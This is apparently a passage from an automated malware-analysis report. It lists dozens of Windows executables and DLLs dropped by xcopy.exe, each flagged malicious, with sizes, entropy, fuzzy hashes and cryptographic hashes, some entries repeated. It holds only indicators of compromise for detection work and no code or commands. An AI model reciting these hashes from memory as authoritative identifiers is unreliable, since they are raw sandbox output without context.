                                                                                                                                                                                                                                  SHA-512:4BAFB61E8618C1506EA6128EF2FBCFEF3F08112B7B134CE4CDB8F216F12D29826A4B96B11A71075A37DA9A9C39A6CFB2AD107C64C43ABFCEBB5148CDC7F87AA1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.851451007592065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Csb50+PJRlOjc5LknKq82PrefmOVIYi1oqLPxh8E9VF0NygQQlMI:Csb50+PfzE8sqfmdYi9PxWEaFN
                                                                                                                                                                                                                                  MD5:05F93CA69FD70753C11E4B394A593783
                                                                                                                                                                                                                                  SHA1:A7E57D66E11A2423B21B1DECC1A97501586407A8
                                                                                                                                                                                                                                  SHA-256:C4589E723B0FAE05705E4B3E7A8CC446F200DB10EF3A85B7F6E6F265222FFB53
                                                                                                                                                                                                                                  SHA-512:7C166CC6FCBBAA04DF1B22F09E73F18E279D68AE24C982BB7BA1A6D463C79A5E46C62E0B61337854D7C6D94312BC271A6198C76374D4C8EDCBE0EAB95503D0F7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.822940211571471
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:UcNWbe0J4rLJaVjtFzq82Dhef5O2IYi1o1Pxh8E9VF0NyaSDEe:UcNWbe0C8EIf50YiYPxWEgSl
                                                                                                                                                                                                                                  MD5:96C7313D215EB1A7435E2B3ED160FFAC
                                                                                                                                                                                                                                  SHA1:A56F5387236537F76601B32A1BB86EA32A0B4BF7
                                                                                                                                                                                                                                  SHA-256:888FC867E3EE6DAD27FC795AA47544667174C235506ED67D1D99AFABF6DAC272
                                                                                                                                                                                                                                  SHA-512:FC89A3A186B50F318C627A378452A65CC1A1C82B5F6FD8869A6EAEE16BBFD103C2571A757483458E1738A7872F38BCDA27A3E66E7EDC8C10B08466511443C2BC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):439208
                                                                                                                                                                                                                                  Entropy (8bit):6.6510194969003855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:IdyX+9Tk5fb+5J56HgGwKz2zRThUgiW6QR7t5s03Ooc8dHkC2es+Fpyd:LX+9TkR+5J56AjKz2VA03Ooc8dHkC2eu
                                                                                                                                                                                                                                  MD5:FDD04DBBCF321EEE5F4DD67266F476B0
                                                                                                                                                                                                                                  SHA1:65FFDFE2664A29A41FCF5039229CCECAD5B825B9
                                                                                                                                                                                                                                  SHA-256:21570BCB7A77E856F3113235D2B05B2B328D4BB71B4FD9CA4D46D99ADAC80794
                                                                                                                                                                                                                                  SHA-512:04CFC3097FBCE6EE1B7BAC7BD63C3CFFE7DCA16F0EC9CD8FE657D8B7EBD06DCBA272FF472F98C6385C3CFB9B1AC3F47BE8CA6D3EA80AB4AEED44A0E2CE3185DD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265856
                                                                                                                                                                                                                                  Entropy (8bit):5.538534369903799
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:hTnPxwb+6T2csJUcODMM4cBqg8UyJNjuGZzfYtRD+E3ABjqDPQf7rhsxfNq:hTnPxwb+6T26bq
                                                                                                                                                                                                                                  MD5:787D5A56940EACF564ED6D6800D22C5C
                                                                                                                                                                                                                                  SHA1:66A882F7868C1D541BE9007805F828070C6627DC
                                                                                                                                                                                                                                  SHA-256:311DDCF7931721978751451446CA6CFBC97E5E65D21CD75999345BF63A0686B2
                                                                                                                                                                                                                                  SHA-512:F9FB7CA613E0B3D16CFE492861597CB295F4F67E0F7884F7ED17CC551A0945A479FB1541D0590D44DDE947C3D320421AF2CFEC402AD39829025BB7DE27B9800E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79792
                                                                                                                                                                                                                                  Entropy (8bit):6.778166830217706
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:5UwZIDobDaHrrAPsCbU4qzBHXpHo0ecbGp9yBOBDozi:7ZPDaHrrobUHzDxecbG3yGo
                                                                                                                                                                                                                                  MD5:BA65DB6BFEF78A96AEE7E29F1449BF8A
                                                                                                                                                                                                                                  SHA1:06C7BEB9FD1F33051B0E77087350903C652F4B77
                                                                                                                                                                                                                                  SHA-256:141690572594DBD3618A4984712E9E36FC09C9906BB845CE1A9531AC8F7AD493
                                                                                                                                                                                                                                  SHA-512:CA63EEAC10EF55D7E2E55479B25CF394E58AEF1422951F361F762AB667F72A3454F55AFC04E967E8CDD20CF3EEBE97083E0438EA941916A09E7D091818EA830E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.824705885017542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ls1ubekJ4rLJa9jDwdq82NDef/OcYIYi1oZPxh8E9VF0NyyCOsdQ:ls1ubekJ8Wif/nBYiKPxWEMHs6
                                                                                                                                                                                                                                  MD5:6EF015EA8BDC66FFD2899FC298E5F10B
                                                                                                                                                                                                                                  SHA1:713C5EDCF935E0AFAFBF3B428B7441DC779D155E
                                                                                                                                                                                                                                  SHA-256:1EBF20CE4DA7FBEB669A102E7C0F5275903345DF1289177FBA5A434753C46A4F
                                                                                                                                                                                                                                  SHA-512:2C533BB242A97B7BFDAE93C61C651A495B65B82A6FE4950C2BDCBBE8172D354A6634E1EA87DD187AB3A7CE72301EA34EDFAC4B7361FE66E53350EA314165852B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60032
                                                                                                                                                                                                                                  Entropy (8bit):6.564305600613777
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8EBICaKKwKolIu+RseFWsliAoEvbpGrYPyDfe1OlU8qODwmYi/PxWEtE:8OIOKK+R5himlQx2Kwm7/PxA
                                                                                                                                                                                                                                  MD5:0485D3658BFA35F13618DC9266330B5A
                                                                                                                                                                                                                                  SHA1:D919DC39B760B49CF9634EDBE7819C5939B08CCA
                                                                                                                                                                                                                                  SHA-256:9D49D5AD3789F20ED950851DC5B5C98E6B977E1C391B31DEBCC19EAEDB60C1A7
                                                                                                                                                                                                                                  SHA-512:47B9E0FE67B11AB55D73228332DA1911DCEF94A6F3536870F80FCAE1CC3DA767669D43FE017F3A5B721EAE79D934885FADCF316E8F23A5D5781FD0EB36DBF6E4
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122496
                                                                                                                                                                                                                                  Entropy (8bit):5.869812804751989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:kRS14g/TFZdJI3dTdbd7YTwdRdNdg7j++1+1+PtW1+g+z+rfSoCxCVCEiJLC7Czp:gS14fh6D
                                                                                                                                                                                                                                  MD5:6082089B6FB3B3C6ACE2A19C0A0BF8C7
                                                                                                                                                                                                                                  SHA1:AB795F6342280BDB8AB387A30C46B7653479FF7F
                                                                                                                                                                                                                                  SHA-256:899AB6BE6100A1A1E5C23C7348C8AF4F1FF974C7D124EA3D1E253DF0835037DA
                                                                                                                                                                                                                                  SHA-512:6FE28EF63D7163561CE9029D61AD205DA19C360C17484A3FC44D9E9E36E10CAEB379A8625F653B4F6400A0ABF06AE1D69F9174E9F23585F1613F579A1839903A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56448
                                                                                                                                                                                                                                  Entropy (8bit):6.743227926837006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:nryFyMib1eqds2/0f0wRYl+mbCTQ785Pxj:mFyMib1eqd/0ZYl+mbCTQ+xj
                                                                                                                                                                                                                                  MD5:53723DA917E21F52990800B3836D7BA3
                                                                                                                                                                                                                                  SHA1:DCF027AF711C4B97E50C7C01200243B84BED882C
                                                                                                                                                                                                                                  SHA-256:E512356F941BB98DD2F0243AA58072F1B8FF47A91E05B5997507D7F80BE569F8
                                                                                                                                                                                                                                  SHA-512:7436E479658B8356C0554D41AC0B93065662C77514D59B13396A9AE464A770F09A8A66492B1BBB27433AFB8A1632AFAE3FACF8B14D24CD676A7681D3153B8D47
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21632
                                                                                                                                                                                                                                  Entropy (8bit):6.6443481132912225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8dDvhGmJh7bEjSndftIYi1orPxh8E9VF0NyTF91:8dkmr7Tf6Yi4PxWE9h
                                                                                                                                                                                                                                  MD5:F203A8BCB40651B0191E57B2EBCBA11C
                                                                                                                                                                                                                                  SHA1:F543AB009F432409DAF0B5B45DFB1BCAE38A1BEE
                                                                                                                                                                                                                                  SHA-256:AE15C9B59E20F66A5089543EE2D6458ADBE432A9A53D7555BE91794478F783F7
                                                                                                                                                                                                                                  SHA-512:C8FB2984A96E88BB828D7F194CDF525EBD073C3E9BD5C0CB26B1040427A61D17A518B47D9B66255775028662F64056980F5D22429606C737C12B76449FF09A51
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.822709813424062
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3sF+beUJ4rLJaNjAQyq82FBXefmOevIYi1oehRPxh8E9VF0NyRvTHh:3sF+beUL8e4fmPQYi7vPxWEPrh
                                                                                                                                                                                                                                  MD5:7B80F51FB73A7EEA2DEF132141C2F899
                                                                                                                                                                                                                                  SHA1:2516C5E38EF955A9703CE67FF588E4D0242F52C9
                                                                                                                                                                                                                                  SHA-256:D9FF32A5C700BC2FA7E1B48F45CAAA190801469E730FDE73BBA287B2F7CD0138
                                                                                                                                                                                                                                  SHA-512:B65F514C6B619D43D7E97D8A8B79B13528D19C181FDB1041F7B6F3926904B5A35227A73B1DF99CD1E8A0AB7E083DA5BB1E17920A7D3AE5C5A1DB5C741B190047
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.820784213431929
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ZM1ubeUJ4rLJapjSadq82nDefSOOIYi1o7Pxh8E9VF0Ny05O7:ZM1ubeUu84ifSsYioPxWEOI7
                                                                                                                                                                                                                                  MD5:0EC73DC06A94C8B37C8C84D4EF2CB661
                                                                                                                                                                                                                                  SHA1:FAE91CA02A2A1A0D09BEC2651720D76CDDB40393
                                                                                                                                                                                                                                  SHA-256:E0CC96E56C911B240E8A0BF70D96B936E0FAF094D936696ECF7E88273E9A8489
                                                                                                                                                                                                                                  SHA-512:743CA538C2FE17C51109B1BAD95D718012A400BF8A50DED598B6E7BA2EA1AC411C7F0158D75214059DE8E286BBE9B811514A3D90FFE8CA6CBF9797E043DE2017
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8249091826776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Is1ubekJ4rLJa9jxh9dq82m7Xef/OuIYi1o6KPxh8E9VF0Ny8GH:Is1ubekBA8Nif/cYivKPxWECc
                                                                                                                                                                                                                                  MD5:14D5480380A89961D603EE29C1DF959C
                                                                                                                                                                                                                                  SHA1:E8AAA190A69107DCB033CAB8A9A35CC845EF1F76
                                                                                                                                                                                                                                  SHA-256:45D2406D17179C8103C528ED91627B32F4FDDD2E69E864119FC05E0CDBA244A0
                                                                                                                                                                                                                                  SHA-512:1BE14151833AEA6A27E5D89A9B2F3000E1647539593444F663901832334CD3107CBF83A32FE52C54ED6AA8E13ACA696BAA10248242EBE15946C9606CDE984C77
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):191104
                                                                                                                                                                                                                                  Entropy (8bit):6.9146371702489935
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:QdIhc3//Kimcp5MBhHOdlaWbsMp7jkX5E1OBCD5ZQxuZYW4rJupGtvfarOpeCxj:QD//Hmcv12WWJEWClZQxuZuupGtvfary
                                                                                                                                                                                                                                  MD5:01A0729BD7CC0FB9F7C5B94818F8FBA3
                                                                                                                                                                                                                                  SHA1:E6316BEF34A6011ECB6D227560831E4B846C6027
                                                                                                                                                                                                                                  SHA-256:904E922D5FD221DF176FF381D62E7FBAB76B525DBA945A83E02D2A5E3398992F
                                                                                                                                                                                                                                  SHA-512:28ADDAD92726DACE0F21DA0CDB69C9B7EAB4318258CF46470B3F7F0CB086FB6117984AB72EAC37F418C146E00EF1290D7CC59C20E7A929D076CBCF46A30B579A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38528
                                                                                                                                                                                                                                  Entropy (8bit):6.723133196876965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3eVqDLd26iDkjSy1ieATp9HUibrdSA52bQjY2/9N2tZvNNJljJjYRebGbmTLIYiV:3eVpadATpRrfNaj7bGbq0YiuLPxWETwJ
                                                                                                                                                                                                                                  MD5:05A5A77A1591896A31C3B8B62C4023FD
                                                                                                                                                                                                                                  SHA1:53E50BD6E86FFF5482B2681BEF39C96642C534FC
                                                                                                                                                                                                                                  SHA-256:48EEF73B02B6752E20512BD96A749A95731F6171D75EBF73E072429A224A37E8
                                                                                                                                                                                                                                  SHA-512:3DA3DC454EE4158FE5C79848A4BE7D83ED66393DA1ADC13806121BF6A16FF8C948A468EE6BCF44C4296B1920BE6C3121D6D0E8D5BBFFAB554AB2CAC5A6D140C3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):628864
                                                                                                                                                                                                                                  Entropy (8bit):5.540451385394713
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:SGbiFJ4jiRK7zsFV4cQ/y0rCsdmipG1XggDRR667++4R+T6s44xv9uXb9f:aqiR3P4cQ/y0rCssipG1NUIT+Xb9f
                                                                                                                                                                                                                                  MD5:9D6942B66233475FA5846201AFD76C87
                                                                                                                                                                                                                                  SHA1:C104089CEDF0DD35024ECFD6C789BE70AA5AFE9C
                                                                                                                                                                                                                                  SHA-256:838EC483DA8947D66FEECD9FBF69E4231A12AD0CBFA1EEC6B31024194D45CA7E
                                                                                                                                                                                                                                  SHA-512:FCCECE115167F2F9E03DB8993FCA56FFFA9CDCF0893FF12F9B73619DE9A2794A47FAD895164992397F6CC301E916B638E792F9C5B9FCAB9F3D44AAD02E62F248
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):85632
                                                                                                                                                                                                                                  Entropy (8bit):5.957156263176118
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:tAbBsnzA3QDkrDW8Kq5ns8nBs1s8nBs5s8nBskEsz2zy77hPxE:t8BszFJqkYUkEsqzy7pxE
                                                                                                                                                                                                                                  MD5:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                                                                                                                  SHA1:A4433AB756C4C3132D6DFB8DCF1D806CE0410EC6
                                                                                                                                                                                                                                  SHA-256:89D8B352D1D387A8695A33BC3D45B1275E23082404AD8C0375C865F7DA883232
                                                                                                                                                                                                                                  SHA-512:51CB7C5984B51015FAEA3AED6004B2717ECCC50685057BD9E709945B1332F75A94D946E99BC698B13B780BE4727FF9C5FD90053F2EC71E5FBC2AA92EAA9CF98B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):143488
                                                                                                                                                                                                                                  Entropy (8bit):6.6116058605853585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:E1jXs38sbIjSYgzan2Xcn36yWfbSIEh+Ilou5UFe86mChsx1e:E1jcRmIzs36yQ2IEh5lou5Me2e
                                                                                                                                                                                                                                  MD5:8680AD1D01FAC6B8928F7B79F991BE9C
                                                                                                                                                                                                                                  SHA1:80EA5D5E2A92DC9EAFCC2A9B23740B469FD67F3B
                                                                                                                                                                                                                                  SHA-256:9EC24FDF81E8BFCF8151A5091CAA1F516CE162CF6F4C50187B60676C3595E58B
                                                                                                                                                                                                                                  SHA-512:7117B1F9B2CC789112A11D8E95B598C6F3C03D16D98D81044771D955E3A7A27D025FDBB7605B43EDF44E4EFA3C30E8C3E8D75B2788015666CA99755326D6F220
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38528
                                                                                                                                                                                                                                  Entropy (8bit):6.627847440883801
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8rAu9Aswd6cad6swBxAQA/h94929KEs0mz8mrzlm3vkYiZPxWEG0UBV:0LBaSQG49Es0mzBzlm3vk7ZPxnUX
                                                                                                                                                                                                                                  MD5:931EFE5BB5AF26C54D6F251623A995B1
                                                                                                                                                                                                                                  SHA1:7C31C0F09DADE6505DA2573D78F371B4DDDEC6D1
                                                                                                                                                                                                                                  SHA-256:4B7A7300A76DDC8C5941D1CA006C3A32AF145A0CA4B6B2F1353CDCF1D78DD9BC
                                                                                                                                                                                                                                  SHA-512:3570DC00ADD1EAF81F9FFACE903BD614819C7FF0D7D3864F85EFE4C336137753828C6EF90E793630469E4EC5BC29C723C752B43E233B6DADE7094D7CBD0E5444
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):219264
                                                                                                                                                                                                                                  Entropy (8bit):6.726188988309741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Se2Yad4EYw0MJobMI+kANwhMb6uA91Jd7pJN:52J4w0Mu7ONwy+X9FdJN
                                                                                                                                                                                                                                  MD5:500A16DDFA5861F513FA0719FFD43385
                                                                                                                                                                                                                                  SHA1:A2D35AEA903D86717772923F9B0D240085678CE8
                                                                                                                                                                                                                                  SHA-256:B3003F8719ED8D3477F0E6D6EECC3DA6F774517F723DAB1E385B25A348AA4161
                                                                                                                                                                                                                                  SHA-512:D97BD5B71F6C75000175D96A914539A4251BD2D16F87D420888F7FC2665E40437712B42095C64FED2D0EF09EE642ECD4199F5C02454EA6F76DBD24FFF4F388DB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.757498048724812
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:AMb500JRlSjo5/Wq82OtefQO4jIYi1oA6DPxh8E9VF0NyOJPFai7R:AMb500fZH8Z8fQGYiNSPxWEQV5
                                                                                                                                                                                                                                  MD5:0D0E43531543CFD4585044B20BAD70B8
                                                                                                                                                                                                                                  SHA1:D5BF28A0A84730030B5A238607AC89499C0F5A5C
                                                                                                                                                                                                                                  SHA-256:8ECB8C8E8CEDF2B65F622955F59D9BE711C846A2D6877D6F7918D63581A26092
                                                                                                                                                                                                                                  SHA-512:D24C32CA43E983ED3D19EC963D25067531FF5FBCE2F2F78182039F8F976C7D9746D586922360947E8461A8452594082251FE1B759CD41C0B72E9B9D3AE753119
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1170904
                                                                                                                                                                                                                                  Entropy (8bit):6.805826320677691
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:+WiAihjcDBXUw9y079gzyVFExlfz+pq12S5qyrmcvIZPoy4spcFOo:NiAihjmXfgzyVFEWc2SEyApcco
                                                                                                                                                                                                                                  MD5:126FB99E7037B6A56A14D701FD27178B
                                                                                                                                                                                                                                  SHA1:0969F27C4A0D8270C34EDB342510DE4F388752CD
                                                                                                                                                                                                                                  SHA-256:10F8F24AA678DB8E38E6917748C52BBCD219161B9A07286D6F8093AB1D0318FA
                                                                                                                                                                                                                                  SHA-512:D787A9530BCE036D405988770621B6F15162347A892506CE637839AC83AC6C23001DC5B2292AFD652E0804BD327A7536D5F1B92412697C3BE335A03133D5FE17
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):74368
                                                                                                                                                                                                                                  Entropy (8bit):6.549222671266717
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:g6pjoSiKJ+d9sJNItXvvl9+ePME7IgBK8G9mHP7CPxh:gtKJI9kytXnr+3E7IgBK8G9mvKxh
                                                                                                                                                                                                                                  MD5:74248894D78B8264A0E90A9D52ADDCFF
                                                                                                                                                                                                                                  SHA1:1594D51C47C0B3605F320A8058AF3062BF1A4280
                                                                                                                                                                                                                                  SHA-256:6FAC5761DD9EA351FA91C95137D8B1DB51CB67C6A8EB52BF5D9E09D46996666C
                                                                                                                                                                                                                                  SHA-512:FF918A2693CF12A2B6D955F68A75D1211ECCA2D896F9ABD6357286243995E4D66D66CDCDA4A4C7352E76C8838F84135766B8E8CF911A1AF3622621777CC94A83
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):181888
                                                                                                                                                                                                                                  Entropy (8bit):5.994928336585377
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:WsVcCXFzlZBn+ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxF:WJCXNwSyMZOy406qS2AroAxnw6fF
                                                                                                                                                                                                                                  MD5:85F86F4450FAD5197994402EF62EC0F1
                                                                                                                                                                                                                                  SHA1:6C460E5F2554D27F7771F83DC7796714274A82C6
                                                                                                                                                                                                                                  SHA-256:C9A489EABD12B0A4561AB4EC4A6C1475830DF32C0D05E4FC563BB4B5DF1FAAAA
                                                                                                                                                                                                                                  SHA-512:1B9F88C1F015632AB86FA901010C7171E0E9FC072BB032A2B4B6D54EECDE178F245DF3A3ED83572CE8848645897BA0E5587E60047C04E3E8D1A388E6770512CD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79792
                                                                                                                                                                                                                                  Entropy (8bit):6.778166830217706
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:5UwZIDobDaHrrAPsCbU4qzBHXpHo0ecbGp9yBOBDozi:7ZPDaHrrobUHzDxecbG3yGo
                                                                                                                                                                                                                                  MD5:BA65DB6BFEF78A96AEE7E29F1449BF8A
                                                                                                                                                                                                                                  SHA1:06C7BEB9FD1F33051B0E77087350903C652F4B77
                                                                                                                                                                                                                                  SHA-256:141690572594DBD3618A4984712E9E36FC09C9906BB845CE1A9531AC8F7AD493
                                                                                                                                                                                                                                  SHA-512:CA63EEAC10EF55D7E2E55479B25CF394E58AEF1422951F361F762AB667F72A3454F55AFC04E967E8CDD20CF3EEBE97083E0438EA941916A09E7D091818EA830E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47744
                                                                                                                                                                                                                                  Entropy (8bit):6.793430588881946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:DQCu8U/M85md+zriZodHjNFjj56MpC5p5B4ItF0k6bJcgqKpeHWstq256QYi4Pxj:MCu8U/M0booC5DiIn0k6bJc+Kq256Q7W
                                                                                                                                                                                                                                  MD5:EC9BA69D10F66D4CC7EC47A1BD1BC0AF
                                                                                                                                                                                                                                  SHA1:1B2645BDA13031E3A9621EE1E618B03F4E1E7382
                                                                                                                                                                                                                                  SHA-256:595D733EE4BBA6983CF69691D1229A83D1A37E52C36144CCC7736CF134677A2F
